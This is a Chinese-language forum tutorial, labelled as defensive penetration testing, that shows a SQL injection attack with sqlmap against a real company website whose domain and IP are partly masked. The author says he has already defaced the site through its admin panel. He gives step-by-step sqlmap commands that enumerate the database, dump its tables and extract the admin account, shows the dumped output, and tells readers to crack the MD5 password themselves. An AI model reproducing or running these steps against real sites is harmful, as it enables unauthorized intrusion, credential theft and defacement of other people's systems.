|
本帖最后由 LFFOX 于 2022-10-31 21:02 编辑
[以防御为目的的渗透测试]
公司:XX科技集团
域名:XXX.cn
IP:122.XXX.XXX.XX
后台:http://XXXXX.COM/admin/main.php
SQL注入点:http://XXXXX.COM/index_set.php?id=1
数据库: information_schema qdm131253668_db
常识:有id就有可能有sql注入点
现在这个站点已经被我从后台篡改了,好废话不多说,开始教程
这个事情其实一个工具就能搞定了
那就是sqlmap
sqlmap是渗透中最常见工具,那具体该怎么使用呢?
[我这里使用的是kali linux 环境自带sqlmap,如果你是在Windows环境可以去sqlmap.org下载,下一节我会发sqlmap的安装教程]
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -dbs
参数解释:-u 指定要扫描的url -dbs 列出所有数据库
然后我等它扫描完,我这边就出现了下面两个数据库 information_schema qdm131253668_db
不用管不用犹豫,直接选第二个列数据库表
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -D qdm131253668_db --tables --dump
Database: qdm131253668_db
[17 tables]
+---------------------+
| calc_params |
| p_admin |
| p_comquotation |
| p_comquotation_base |
| p_comsoftclass |
| p_config |
| p_down |
| p_edusoftclass |
| p_formula |
| p_link |
| p_msg |
| p_newsbase |
| p_newsclass |
| p_newscontent |
| p_set |
| products |
| quotations |
+---------------------+
这是爆破出来的列表名 仔细看 重点在p_admin列表,一般到这一步,看到ueser_name user admin 这些或者类似这些里面就会有账号和密码
但是这个本身是一个企业网站,就一个管理员账号
走到这一步我们继续往下走
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -D qdm131253668_db -T p_admin --tables --dump
这个结果就有了账号和密码
+-----+------+-----------------+----------------------------------+----------+
| uid | m_id | name | password | username |
+-----+------+-----------------+----------------------------------+----------+
| 1 | 1 | 不告诉你 | 不告诉你 | admin |
+-----+------+-----------------+----------------------------------+----------+
这里的password和name我就不透露了,username 还是 常见的 admin
不过这里的password进行了md5加密,自己去解密一下就可以了
不要去恶意破坏他人网站
其实sqlmap的利用还有很多,还可以拿服务器的shell等等
自己去摸索吧,本期就到这里了
I'm not a hacker, I'm ... You guess?
|
上一篇:x86x64软件逆向分析入门下一篇:sqlmap渗透工具Windows环境安装
|